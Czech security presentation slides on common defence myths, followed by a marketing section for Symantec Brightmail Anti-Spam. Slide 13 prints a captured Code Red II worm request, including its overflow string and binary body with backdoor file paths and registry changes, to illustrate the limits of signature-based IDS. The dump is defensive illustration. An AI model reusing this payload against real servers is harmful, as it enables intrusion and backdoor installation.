Mýty a reality bezpečnostiMýty a reality bezpečnosti

Jaroslav TechlJaroslav Techl

techl@abdist.cztechl@abdist.cz

ABAKUS Distribution, a.s.ABAKUS Distribution, a.s.

2 –

• Téměř všechny větší společnosti se ocitají bez perimetru• Částečně se jedná o důsledky diverzifikace obchodních aktivit

• Masové užívání přenosných počítačů přináší zcela zásadní rizika

• Naprostá většina útoků je aplikačních a přichází povolenými porty

• Ze zvýšeného „virového šumu“ vyrůstají nebezpečné útoky, realizované pomocí replikujících se červů

• Nebezpečné kódy zneuživají zranitelností a hackují sítě zákazníků

• Jsou vykrádána citlivá data, která jsou odesílána neznámým příjemcům

• Téměř všechny „pokročilé“ červy byly spojeny s trojskou logikou

• Dochází k ochromujícím DDoS útokům ne zvenčí, ale zevnitř sítí

• Kompromitace zevnitř jsou stále více záměrem vnějších útočníků

Čeho jsme stále více svědky?

3 –

Proč se to děje s takovým úspěchem?

Příčinou nejsou jen úspěšní útočníci, ale také neúspěšní

obránci, podléhající řadě bezpečnostních mýtů.

4 –

1. mýtus – „Technologie rozhoduje“

• Rozhodují lidé!

• Zranitelný software tady bude a výrobce to nevyřeší.

• Útočníci tady také budou a budou kompetentní.

• Zvyšujte tedy svoji kompetenci rychleji.

• Základem je znát, ne domnívat se! Myslet, znamená nevědět.

• Naprosté většině úspěšných útoků předcházejí nezpozorovaná nebo ignorovaná varování

• Přes pokles tempa vzniku nových zranitelností zůstává stále frekvence na úrovni 73/týden (statistika CERT za rok 2003)

• Očekávat, že tuto záplavu zvládnou provozně orientovaní správci bez nástrojů je zcela iluzorní a nerealistické

• Většina útoků nevyžaduje žádnou nebo jen minimální interakci s uživatelem. Ten jim nezabrání. Proti profesionálovi musí stát profesionál.

5 –

Realita – inkubační doba zranitelností

0

50

100

150

200

250

300

350

Inkubace

MS IIS and PWS Extended Direcotry Traversal ISC Bind Transaction Signatures

SSH CRC Compensation Attack Detector MSIE MIME Header Attachment Excution

MS IIS printer ISAPI Extension MS IIS Indexing Server ISAPI Extension

Soaris lpd Remote Command Injection CDE dtspcd Buffer Overflow

V Login Buffer Overflow PHP Post File Upload Buffer Overflow

Open SSH Channel Code OffByOne MS Win Process Handle Local Privilege

MS SQL Server Resolution Service Stack Apache Chunk Encoding Memory Corruption

Open SSH Challenge Response Buffer Overflow Open SSL Malformed Cleint Key Remote

6 –

2. mýtus – „Vždyť jsou to jen viry!“

• Nejčastěji Vás ohrožují replikující se „kódy – hackeři“

• Napadení typicky přichází po vně povolených portech nebo zevnitř sítě

• Jsou atakovány zranitelnosti a standardně otevřené porty nechráněných služeb

• Vlastní smtp enginy v těle kódu vedou k anonymnímu vykrádání informací

• Souběh skanů a nelegálních smtp transakcí zapříčiňuje DDoS útok zevnitř

• Koncový uživatel je čistou obětí, nikoliv „spolupachatelem“ škod

• Drtivá většina těchto kódů v sobě obsahuje nebo umožňuje trojskou logiku

• Samotné antiviry (bez ohledu na výrobce) často nemohou útoku účinně zabránit

7 –

Realita – kombinované hrozby

8 –

Rozsah napadených platforem

• Compaq OpenVMS

• Compaq True64 Unix

• Cray UNICOS

• Entegrity DCE/DCF for Linux, True 64 Unix

• Entegrity PC-DCE for Windows

• HP Advanced Security for VP HP-UX, Solaris

• HP-UX 10.2-11.0

• HP OpenView Operations, VP Manager

• IBM DCE Windows, AIX, Solaris

• MS Windows 2000 Advanced Server, Data Center, Professional

• MS Windows XP Home, Professional

9 –

Blaster: Co to bylo?

Červ, který se chová jako naprogramovaný hacker• Spustitelný kód je tajně umístěn do počítače• Dorazí jako deformovaná zpráva přes port 135 (DCOM RPC)

Důvody jeho úspěšnosti• Využití známé zranitelnosti Microsoft RPC.

— Shodí službu a vloží deformovanou zprávu do systému

• Port 135 je v interních sítích typicky ponecháván otevřený, výsledkem je interní DDoS

• Port 135 je používán pro Win management, i v případě osobních firewallů bude často přístupný

• Infikovaný stroj se restartuje předtím, než může být zaveden patch• Vzniká plných 27 dní před vyrobením patche

10 –

3 .mýtus – „Jsme přece za firewallem“

• Jste si jisti slůvkem „za“?• Značná část vlastních uživatelů pracuje velmi frekventovaně mimo perimetr

— Mobilní pracovníci s notebooky, palmy apod.

— Absence osobních firewallů (zejména kvůli slabinám v administraci)

— Korporativní firewally stojí pouze na připojeních k Internetu

— Povolené porty a služby, které jsou vynuceny obchodními činnostmi

• Značnou část externích subjektů pouštíme velmi frekventovaně za perimetr

— Obchodní partneři, zákazníci, dodavatelé, veřejnost

— Servisní pracovníci, vývojáři, testovací práce, pilotní projekty

— Outsourcing a diverzifikace činností uvnitř korporací

• Proč tedy mnoho těchto útoků přes Váš firewall prošlo?

— Část jich propouštíte podle vlastních pravidel (až 80% útoků je aplikačních)

— IDS systémy nejsou nasazovány tak, aby prohloubily perimetr směrem dovnitř

— To, že se útoky za firewallem projevily, neznamená, že skrze něj přišly

11 –

Realita – nejčastěji skanované porty

27%

18%

13%

11%

7%

7%

7%

5%5%

Common Internet File System

NETBIOS Name Service

Microsoft SQL Monitor

HTTP

FTP

Microsoft SQL Server

NetBios RPC

HTTPS

17300

12 –

4. mýtus – „IDS – to je, co frčí!“

• Co je to síťové IDS založené na signaturách útoků?• Signaturové IDS je svým mechanismem de facto blízké „packetovému antiviru“

• Vysoká aktualizační zátěž (není signatura, není detekce)

• Existuje asi 3000 známých útoků vs. současné IDS jsou schopny uplatnit 600 signatur

• Nulová účinnost v nulových dnech vs. simulace účinnosti honbou za známými útoky

• Vysoký počet falešných hlášení a snadná možnost zneužití zvenčí

• Proč mají výrobci síťových IDS tak malou instalovanou bázi?• Každé reálně nasazené IDS zakládá problém typu „24x7x365“

• Minimální podpora agregací a korelací útoků vs. statisíce izolovaných událostí

• Vysoká pracnost odlišení falešných hlášení od skutečných síťových útoků

• Finální rozčarování pak vede k tomu, že mnohé systémy končí opět v krabici na skříni

• Detekce anomálií v protokolech a provozu, využívající signatur jen doplňkově

• Použití výkonných agregačních a korelačních enginů – incidenty

13 –

Realita – omezení signaturových systémůGET default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3 %u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0 Content-type: text/xmlContent-length: 3379 ﾈﾈ ` ・ ・ﾌ dg 6 dg ・ 鞜 h 劫 \ P U 恪・ P U ・ @ ・燕 X U ・ 斑 = 版ﾍ 燕ｶﾉ T 丘 ×0 ・ ・ ﾇ F0 ・ ・ CodeRedII ・ $ U ､ Yj 劫 p P uU ｰｻ ﾀ tK3 U ・ 3' u? ・ ・ ・ 畿ﾇ ﾇ ﾇ � 怨 d 劫 h Pj 劫` Pj j U 屠 Th~fu U ､ Y ・ u1 X- ﾓ j h ・ P uU ｬ = ・ uj j 劫 \ P uU uU 鱸 ｴ ｻ ﾟ w ・ ・ xu ｻ ` ・ 掬$dg ・ Xa ・ dg 6 dg ・ f ・ MZu 繼 K< ・ PE u 亀ﾗ x 毅ﾓ ・ KERNu －ﾅ EL32u ｻ 3 ﾉ I 脚 A ・ｭ GetPu|rocAu ・ JI ・ﾑ J$ ｷ・ﾁ J ・ 吋ﾃ $$dg ・ Xa 鏖云・ﾃ E LoadLibraryA u ・ UE CreateThread u ・ UE GetTickCount u ・ UE ・ Sleep u

・ UE 韋 GetSystemDefaultLangID u ・ UE 蒻 GetSystemDirectoryA u ・ UE 琲 CopyFileA u ・ UE ・ ﾜGlobalFindAtomA u ・ UE ・ ﾘ GlobalAddAtomA u ・ UE ・ ﾔ CloseHandle u ・ UE ・ ﾐ _lcreat u ・ UE ・ ﾌ _lwrite u・ UE ・ ﾈ _lclose u ・ UE ・ ﾄ GetSyste mTime u ・ UE ・ ﾀ WS2_32.DLL UE ・ ｼ socket u ｼ UE ・ ｸ closesocket

u ｼ UE ・ ｴ ioctlsocket u ｼ UE ､・ connect u ｼ UE ・ ｰ select u ｼ UE ・ send u ｼ UE ・ ｬ recv u ｼ UE ・ ｨgethostname u ｼ UE 懆 gethostbyname u ｼ UE 倩 WSAGetLastError u ｼ U 碑 USER32.DLL UE 占 ExitWindowsEx u ・UE 古畿・ﾀ ・ @ 右 ы ・ xV4 ﾁﾀ 鞦ﾃ < t ・ t 竟旗韆韓・鞋旗靱韓雍・ﾁ ・ Y ・・ﾘ # ・ﾘ � ・ t 麾鍗 t ・拗 t 津 h 劫 \ P U 熏ｼ \ ・ \CMD.EXE ^ ・･､ｳ cj ・ d:\inetpub\scripts\root.exe ・ $・劫 \ P U ﾜ j ・ d:\progra~1\common~1\system\MSADC\root.exe ・ $ ・劫 \ P U 霄ﾜ ・ ZP ｸ @ ・・・ PE L *%) 潤 @ @ 0 ・ ` @ ﾀ 0 @ ・・・・・・・・・・・・・・・・・・・・・・ ﾀ h h ﾐ @ 鐶 査 ﾐ @ ｾ @ ････ jh ﾐ @ 鎰 ・ h ﾀ‘ ・ ・ h ﾘ $@ h? j h @ h ・ ﾀ u&jhT @ jj hH @ 5 ﾘ $@ ・ 5 ﾘ $@ ・ h ﾘ $@ h? j hX @ h 竟 ﾀ uU ・ｽ @ 鎰 ｽｨ @ 錚 j h ｸ @ jj h ｰ @ 5 ﾘ $@ 雍 j h ﾄ @ jj h ｴ @ 5 ﾘ $@ 陌 5 ﾘ $@ 陏 ﾃﾇ ﾐ $@ h ﾐ$@ h ﾐ @ h ﾔ $@ j U 5 ﾘ $@ 鐐 ﾀ uI ｡ﾐ $@ ﾀ t@ ｾﾐ @ > t6Ff× ,,u217 ・ ﾌ @ ・ﾐ $@ 5 ﾐ $@ h ﾐ @ jj U 5 ﾘ $@ ・ ﾃ %`0@ %d0@ %h0@ %p0@ %t0@ %x0@ %|0@ ・・・・・・・・・ \EXPLORER.EXE 　 SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon SFCDisable ・ SYSTEM\CurrentControlSet\Services\W3SVC\Parameters\Virtual Roots /Scripts /MSADC /C /D c:\,,217 d:\,,217 ・・・・・・・・・・・・ <0 ・ `0 L0 ・ p0 ・ ｦ 0 ｾ 0 ﾈ 0 ﾜ 0 ・ 0 ・ ｦ 0 ｾ 0 ﾈ 0 ﾜ 0 ・ 0 KERNEL32.dll ADVAPI32.dll Sleep GetWindowsDirectoryA WinExec RegQueryValueExA RegSetValueExA RegOpenKeyExARegCloseKey ・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・ ^ ｿｹ j ・ d:\explorer.exe ・ $ ・ U ﾌ・ tM 怨 L 旗ｬ 8>u'j ・ jV ｵ L U ﾈ FOu ﾅｵ L U ﾄ ﾃ � 珒 ・・ﾃ a ﾉﾂ

14 –

5. mýtus – „Více výrobců = více jistoty!“

• Ani kombinace technologií různých výrobců nemusí být všelékem• Kombinace různých produktů od různých výrobců má své kouzlo (například v případě

heuristické kontroly antivirů)

• Přináší však řadu úskalí – různá správa, rozdílná aktualizace, občasné konflikty na stejných systémech

• Mezníkem je často velikost společnosti – važte proti sobě výhodu různosti a problém neovladatelnosti

• Náklady na integraci často překračují náklady na produkty• Základním problémem integrace není to, „aby si produkty navzájem rozuměli“

• Jde o to, aby lidé rozuměli tomu, „co se ve všech těch produktech současně děje“

• Účinnost je založena na informaci, na jejímž základě se rozhodnu a správně konám

• Často neplatí, že kombinace „toho nejlepšího“ dává něco „ještě lepšího“

15 –

Realita – Jak pejsek s kočičkou vařili dort

16 –

6. mýtus – „Hacker je technický genius“

• Sociální techniky jsou stále velmi účinné a měli by být prověřovány

• Technické zranitelnosti svých systémů můžete relativně snadno zjišťovat, už jste někdy zavolali koncovému uživateli

• Základní školení bezpečnostních praktik by nemělo být dlouhodobě obcházeno (Enterprise Security Awareness Program)

• I nízká kvalifikace může stačit při velké důvěře nebo neomezené příležitosti

• Sociálně založený hacking přichází často i zevnitř (rozdílná motivace)

• James Bond na střeše nepřistane, stále je jednodušší dát někomu peníze

• Snažte se personálními opatřeními snížit fluktuaci klíčových pracovníků

• Fluktuace se typicky týká shodných nebo podobných oborů – Vaši lidé přijdou ke konkurenci

• Omezujte obtížně kontrolovatelné technologie (plošné přístupy přes ODBC, klíčová data ve sdílených adresářích...)

17 –

7. mýtus – „Všichni si rozumíme“

• Sociální techniky jsou stále velmi účinné a měli by být prověřovány

• V čem spočívá podstata lidské komunikace a v čem je její problém?

• Strana, která „kóduje“ používá jiný klíč, než strana, která „dekóduje“

— Různá úroveň znalostí a kvalifikace

— Různé zkušenosti a představy o sdíleném obsahu

• Mnoho scénářů úspěšných útoků počítá s tímto faktem !!!

• Než se lidé dohodnou, často již není na čem se dohadovat• Fingované útoky proti IDS odvádějící pozornost bezpečnostních specialistů

• Kombinované útoky různůmi červy ve stejném čase nebo v těsné souslednosti

• Různé projevy téhož na různých úrovních

— Jak to vidíme „my od firewallu“

— Helpdesk už má zase problémy s aplikací

— Správce něco udělal s přístupy...

18 –

Hlavní zásady účinné bezpečnosti

• Příčinou nejsou jen úspěšní útočníci, ale také neúspěšní obránci• I bezpečnostní specialisté často redukují bezpečnost na technologii

• Zásadně je podceňována hodnota přesných informací a včasných varování

• Naprostá většina společnostní používá pouze kombinaci firewall/antivirus

• Převážná většina firewallů nepracuje na aplikační vrstvě a není schopna rekonstruovat pakety na vnitřních rozhraních

• Základním problémem jsou lidé, jejich informovanost, komunikace, rozhodnutí a akce

• Ze zvýšeného „virového šumu“ vyrůstají nebezpečné útoky, realizované pomocí replikujících se červů

• Nebezpečné kódy zneuživají zranitelností a hackují sítě zákazníků

• Jsou vykrádána citlivá data, která jsou odesílána neznámým příjemcům

• Téměř všechny „pokročilé“ červy byly spojeny s trojskou logikou

• Dochází k ochromujícím DDoS útokům ne zvenčí, ale zevnitř sítí

• Investujte do zhodnocení dat, která již máte a do schopnosti řídit odezvu

19 –

Realita v České republice včera

Antivirové záznamy celkem

Antivirové záznamy HTTP/FTP

Provoz na perimetru

Útoky podle typu ne jen AV

20 –

Stav spamu – v průměru 66% jsme naměřili v ČR

Průměrné stavy po měsících:• Listopad 2004 52%• Prosinec 2004 71%• Leden 2005 82%

Z toho bylo zamořeno červy:• Listopad 2004 7% z celkového objemu (tj. 3928 zpráv)• Prosinec 2004 3% z celkového objemu (tj. 1981 zpráv)• Leden 2005 1% z celkového objemu (tj. 8 zpráv)

(Výsledek za leden je zkreslen tím, že jsme testovali účinnost firewallů před antispamovou bránou.)

21 –

Údaje spamové sondy po měsících

0

10000

20000

30000

40000

50000

60000

70000

Listopad Prosinec Leden

Zpracovano Spam Viry a cervy

22 –

Podrobnější pohled po týdnech

0

5000

10000

15000

20000

25000

30000

31.10.04 14.11.04 28.11.04 12.12.04 26.12.04 9.1.05 23.1.05

Zpracovano Spam Viry a cervy

23 –

Virová zátěž ve spamu po měsících

0

10000

20000

30000

40000

50000

60000

70000

Listopad Prosinec Leden

Zpracovano Viry Cervy Neskanovatelne

24 –

Viry a červy ve spamu po týdnech

0

5000

10000

15000

20000

25000

30000

31.10.04 14.11.04 28.11.04 12.12.04 26.12.04 9.1.05 23.1.05

Zpracovano Viry Cevy Neskanovatelne

Architektura a nasazení řešeníSymantec

26 –

Základní pohled na architekturu

Na straně Symantec U zákazníka

Až 25% pošty v Internetu!

Aktualizace od 10 minut

27 –

Architektura Symantec Brightmail Anti-Spam 6.x u zákazníka

28 –

Analýza SPAMu: centra BLOC

29 –

Analýza SPAMu: zkušební síť

• Shromažďuje obrovská množství pošty pro spam analýzu

• Poskytuje varování přes spam útoky a jinými hrozbami v reálném čase

• Doručuje spam a falšovanou poštu do center BLOC, kde je analyzována a zpracována

• Agreguje statistiky o celkovém poštovním provozu, dovoluje měřit úrovně spamování

• Patentová ochrana: Symantec je držitelem unikátního patenru na spam honey-pot

• Globální pokrytí: Zahrnuje adresy od ISP a velkých korporací v Americe, regionu EMEA a APAC

• Mimořádný rozsah: Přes 2 miliony klamných mailových adres a domén. Spolu se vzorky spamové pošty od zákazníků kontrolujeme přes 300 milionů poštovních adres

• Zákazníci vytvářejí nové adresy, které směrují poštu do center Symantec/Brightmail

• Adresy jsou navrhovány tak, aby přitahovaly spammery a jsou široce publikovány

Základní funkce Proč je to unikátníJak to pracuje

Způsoby a metody filtrování

31 –

Obrana proti Spamu: víceúrovňový přístup

32 –

Fitrování dle identity a reputaci

• Identita: Určení domény, IP adresy nebo poštovní adresy odesílatele příchozí zprávy

• Reputace: Monitoring chování odesílatele a zdroje pošty s cílem určit poměr mezi legitimní poštou a spamem posílaným z daných adres

• Spolehlivost: Každý počítač v Internetu má unikátní IP adresu

• Obtížné oklamání: I když spammeři mohou snadno podvrhnout adresu odesílatele (help@citibank.com), nemohou snadno maskovat IP adresu odesílajícího stroje

• Problém otevřených relayí: Spammeři mohou používat otevřené relaye, které jsou vlastnictvím odesílatelů legitimní pošty

• Kvalita: Seznamy musí být extrémně přesné a často aktualizované, aby se mohly vypořádat se spammery

Co to je Výhody Výzvy

33 –

Co se děje na pozadí reputací?

34 –

Služba reputací: první linie obrany

Reputation Service

• Seznam otevřených proxy: zahrnuje stroje infikované nebezpečným kódem

• Seznam podezřelých: včetně strojů, jejichž pošta je vysoce spammová

• Seznam bezpečných: zahrnuje stroje, které neodesílaly spam

Dostupné seznamy

• Symantec trvale analyzuje reputaci IP adres, které odesílají poštu

• Symantec/Brightmail Scanner se rozhoduje buď v úplné nebo částečné závislosti na reputaci IP adresy odesílatele

• Služba plně integrována do Symantec /Brightmail Anti-Spam

Jak to pracuje

35 –

Filtrování podle reputace: výhoda pro zákazníka

• Patentovaná testovací síť proaktivně odhaluje otevřené proxy

• Ignoruje otevřené relaye, snižuje pravděpodobnost falešných detekcí

• Filtruje individuální servery, ne farmy

• Každou hodinu je vytvářen kompletně nový seznam

• Centra BLOC automaticky verifikují, zda jsou IP adresy otevřenými proxy

• Nové seznamy jsou každou hodinu automaticky znovu aktualizovány

• Nasazení je možné kdykoliv (restrikce nejsou omezeny pouze na poštovní gatewaye)

• Jediné řešení s aktualizovanými filtry na bázi reputace

• Nesrovnatelně vyšší přesnost a 2x vyšší výkonnost oproti standardním DNS lookup metodám

Přesnost Automatizace Flexibilita a rychlost

36 –

URL odkazy ve spamových zprávách

• Spammeři ve zvýšené míře užívají URL odkazy v poště

• 90% spamové pošty obsahuje URL odkaz, který může uživatel použít

Proč?

Spam URL Filtry

1. BLOC extrahuje v testovací síti URL od spamu

2. BLOC vytváří seznam URL od spammerů

3. URL odkazy jsou testovány, aby se zjistilo, zda je za nimi webový server spammerů

4. URL odkazy jsou stahovány do scannerů na straně zákazníka

5. E-mail se spam URL je blokován

Hrozba

Spammeři vydělávají velké peníze generováním webového provozu nebo

vybízením uživatelů k nákupům

Odezva

37 –

Spam URL Filtry: výhoda pro zákazníka

• Práce v reálném čase s dynamickými daty z testovací sítě – žádné „zatuchlé“ seznamy s filtry

• Přes 20.000 aktivních URL odkazů v seznamu

• Nové URL filtry jsou nasazovány každou hodinu

• Detekce falšovaných URL odkazů

• Rychlá kontrola shody u jednoduchých URL

• Pokročilá, heuristická analýza URL shody

• Zvláště efektivní proti URL odkazům typu „mailto:“

• Jen samotný spam URL filtr zachycuje přes 70% spamové pošty

• Vysoce účinné proti širokému rozsahu spamových zpráv

Trvalá aktualizace Flexibilita a rychlost Účinnost

38 –

Technologie antispamových signatur

• První generace technologie signatur

• MD5 hash na těle zprávy

• Zachycuje všechny identické zprávy, mající shodný MD5 hash

Hash na zprávě

• Patentované signatury pro zachycení “nejasných” shodností s tělem zprávy

• Identifikují mutace a náhodná generování používaná spammery k obejití filtrů

• Zachycují specifické útoky (a jejich variace) přímo ve fázi jejich rozvoje

BrightSig2

• Třetí generace technologie signatur

• Extrahuje přesné signatury MIME obsahu (např. pornografické obrázky, klamnou grafiku nebo i červy)

• Filtruje spam přílohy, současně povoluje průchod legitimním přílohám

Signatury příloh

39 –

Signatury příloh: poslední generace

40 –

Taktika spammerů: obejití filtrů falšováním HTML kódu

Jednoduchý způsob, kterým může spammer zařídit náhodné

generování obsahu zpráv

Zprávy s HTML mutacemi jsou velmi obtížně zachytitelné filtry

41 –

BrightSig2: Boj proti mutovaným spamům

Předem blokuje náhodně generované zprávy, které jsou mutacemi původního spam útoku

42 –

Heuristické filtrováníHledá víceré vlastnosti spamu

• Každá vlastnost „získává“určitý počet bodů

• Body se postupně sčítají• Je-li dosaženo SPAM skóre,

je zpráva blokována

Výhody• Dobré pro boj se zcela

novými spam záplavami

Nevýhody• Detekce může být delší• Spammeři zprávy často testují proti některým heuristickým enginům ještě

předtím, než záplavu spustí• Heuristiky musí být „trénovány“, aby zachytily spam (často za cenu zvýšení

počtu falešně blokovaných zpráv)

43 –

Heuristické filtrování: přednosti Symantecu

Z podstaty věci samé je většina heuristik konkurentů

kompromisem mezi účinností, přesností a výkonností

• Heuristika není naší primární antispamovou technologií, ale je pouze doplňkem

• Je použita až při neúčinnosti všech jiných filtrů

• Je proto navržena pro 5-10% celkové účinnosti systému

• Používá kompilovaný kód, který je 2-4x rychlejší než kód interpretovaný

Přesnost a rychlost

• Heuristika je automaticky trénována centry BLOC na straně Symantecu, a to s využitím testovací sítě a legitimní pošty

• Administrativní zátěž je dále snižována pomocí automatické aktualizace

Žádné „trénování“

44 –

• Jazykově agnostická – technologie filtrování

• Jazykově specifická – heuristika

• Zeměpisně založené – filtrování reputace

• Language ID pro velkou skupinu jazyků

• Filtrování jazyka “per user“

• Globální pokrytí BLOC

US

EMEA

APAC

• Jazykové schopnosti analytiků BLOC (plynně hovoří většinou světově používaných jazyků – dokonce i česky a slovensky)

Filtrování na bázi jazyka

Okolo 10% spamové pošty je v jiném než anglickém jazyku

Symantec umí zákazníka chránit před ne-anglickým spamem

Technologie filtrování Expertíza / zdroje

45 –

Příklad: Filtrování a identifikace jazyka „per-user“

46 –

Nebezpečný obsah: další velká hrozba

Antivirová detekce na bázi Symantec Scan Engine• Detekuje viry a červy ve zprávách a jejich přílohách• Červy jsou ze zpráv automaticky vymazávány• Antivirové definice jsou aktualizovány společně s antispamovými pravidly• K dispozici je oddělené i dodatečné licencování

47 –

Zákaznické filtry: silný doplněk

Umožňují správcům, aby filtrovaly jiné, než spamové zprávy• Vytvoření gobálních, na serverech založených filtrů pomocí editoru Custom

Filters• Víceré podmínky a skanovací kritéria:

— IP Addresy

— Odesílatel, příjemce, From, To, CC

— Pole záhlaví

— Tělo

— Velikost

— MIME záhlaví

Volitelné akce se zprávami

Minimální zátěž správců

49 –

Symantec/Brightmail Control Center

Webové rozhraní pro:• Centralizovanou správu

— Tlačná nastavení

— Získávání logů

• Webová karanténa— Rozhraní admina

— Rozhraní uživatele

• Monitoring— Summární přehled

— Stav „per- machine“

— Logy

— Statistiky a reporty

50 –

Globální správa a okamžitý celkový přehled

Centralizovaná správa vícenásobných serverů• Statistiky logů za jednotlivé nebo agregované skanery• Konsolidované reporty za všechny skanery

51 –

Jednoduché nastavení přes Control Center

Seznam blokovaných uživatelůSeznamu povolených adres Skórování účinnosti obsahových filtrů

Aktivace filtrování podle reputacíAktivace kontroly jazky

• Vložený Tomcat • Vložené MySQL• Vlastní software

– Webové stránky– SMTP Listener– Revize a vymazání– Upozornění

Kompletní řešení

Migrace nastavení předchozích verzí

Varování před událostmi

Konsolidované reportyKonsolidované pohledy na individuální logy

Skupinové politiky

Nastavení a přístup ke karanténě

Nastavení Brightmail skanerůIdentifikace externích mail serverů

Nastavení privilegií administrátorů

Antivirová kontrola

Vytvoření obsahových filtrů zákazníka

Změna LDAP nastavení

52 –

Skórování spamu

Každá spam zpráva ma skóre

Zprávy přes 90 dostávají verdikt

spam

Administrátor může měnit a ladit

skórování spamu

Administrátor může definovat

„spodní hranici“ skóre pro

podezřelé zprávy

Akce a nastavení jsou definována v

rámci skupinových politik

53 –

Vytvoř seznam „Top 10“:- nejspamovanější zaměstnanci- nejspamovanější domény- IP připojení spammerů a další...

Detailní Reporting

Za víceré kategorie zpráv• Jako jsou: zpracované, spamové, podezřelé, povolené, blokované,

virové atd.

Reporting podle vícerých kritérií• Příjemce• Odesílatel• Doména příjemce• Doména odesílatele• IP připojení atd.

Výhody• 19 předem připravených zpráv• Prohlížeč zpráv v Control Center• Ad hoc generování nebo

nastavené intervaly• Export do vícerých formátů

54 –

Skupinové politiky: k čemu jsou dobré?

55 –

Skupinové politiky: rozsah

• Všechny poštovní domény

• Sub domény

• Individuální uživatelé

• Podpora výběru typu „wildcart“

Různí členové skupin

• Spam

• Podezření na Spam

• Blokovaný odesílatel

• Povolený odesílatel

• Virus

• Červ

6 kategorií pošty

• Vymazání

• Označení těla zprávy

• Označení záhlaví zprávy

• Forward na poštovní adresu

• Uložení na disk

• Normální doručení

6 typů verdiktu

56 –

Komunikace• HTTPS mezi skanery a Control Center• HTTPS mezi správci, koncovými uživateli a Control Center (volitelné)

Privilegia administrátorů• Podpora vícerých typů privilegií• Různá privilegia pro různé administrátory

(někteří pouze přistupují ke karanténě,

jiní mohou měnit nastavení serverů...)

Autentikace koncového uživatele

přes LDAP do:• Active Directory• Exchange• SunOne

Control Center – bezpečnost správy

57 –

LDAP: schopnosti a výhody

Expanze poštovních aliasů• Karanténa dělá automatický resolving všech aliasů

a doručuje zprávy na karanténní účty tak, jak přísluší výchozím poštovním adresám

Karanténa může přistupovat k LDAP adresářům, jako jsou:

• Active Directory (Exchange 2000 a Exchange 2003)• Exchange 5.5• Sun ONE Directory Server

Přizpůsobitelné atributy LDAP:• Nastavení dotazů do LDAP je plně přizpůsobitelné.

Atributy dotazů lze kombinovat tak, aby byly ve shodě se schématem Vašeho LDAP adresáře.

58 –

Systémová varování

Okamžitá upozornění při výskytu

určitých provozních podmínek

Zasílá varovné maily správcům nebo

jiným pracovníkům

Aplikovatelné podmínky: • Některá z komponent neodpovídá nebo

nepracuje• Antispamové filtry jsou starší, než je

definovaný časový úsek pro aktualizaci• Antivirové definice jsou starší, než je

definovaný časový úsek pro aktualizaci• Karanténa má málo diskového prostoru

59 –

Rozšířené webové rozhraní karantény

• Spam je na vstupu centrálně ukládán a vůbec neprochází sítí

• Koncoví uživatelé jsou o spamu denně nebo týdně informováni

• Centralizované vymazávání spamu po uplynutí počtu X dnů

• Možnost “uvolnit” karanténované zprávy do inboxu uživatelů

• Uživatelé mají trvalý přístup ke karanténě

• Uživatelé i administrátoři mají k dispozici prohledávání

Výhody

60 –

Ukázka karantény

Na co si dát pozor u antispamu?

62 –

Ptejte se na: míru přesnosti!

Kritérium 1: Přesnost a správnost

Jenom zachytit spam samo o sobě nestačí• Zachycení spamu a přesnost antispamu – obojí musí být hodnoceno současně• Přesnost je často důležitější než účinnost (blokování legálních zpráv je

nejčastějším důvodem krachu antispamových projektů)• Mezi dodavateli jsou právě v oblasti přesnosti největší rozdíly !!!

Blokování legálních zpráv vytváří stejně velký problém jako spam• Uživatelé nejsou schopni dohledat poštu a bojují proti antispamu• Správci pošty, případně helpdesk řeší laviny eskalací• Dochází k obchodním ztrátám kvůli výpadku v doručování

63 –

Ptejte se na: měřitelnou účinnost !

Kritérum 2: Skutečná účinnost

Vícenásobné technologie zaručí kompletní ochranu před spamem• Žádná anti-spamová technologie není „kouzelným tlačítkem“• Různé filtry jsou efektivní proti různým typům spamu• Spammer musí překonat každý filtr víceúrovňového řešení

Inovace a globální pokrytí• Potřeba konstatní inovace je definována tím, že antispam musí být stále o krok

před spammery• Schopnost účinně filtrovat ne-anglické jezyky, včetně nativní podpory českého

jazyka

64 –

Ptejte se na: Minimální administraci !

Kritérium 3: Administrativní zátěž

Správce pošty a antispamu už nejsou “paní na hlídán픕 Automatické aktualizace filtrů• Není nutné žádné ladění a „učení“ heuristiky• Nainstaluj a běž – dělat něco jiného• Symantec vytváří filtry v režimu 24x7x365• Automatické řešení falešných blokací

Vysoké nároky na správu představují největší část „neviditelných“

nákladů na antispamová řešení

65 –

Proto jsme tady !!!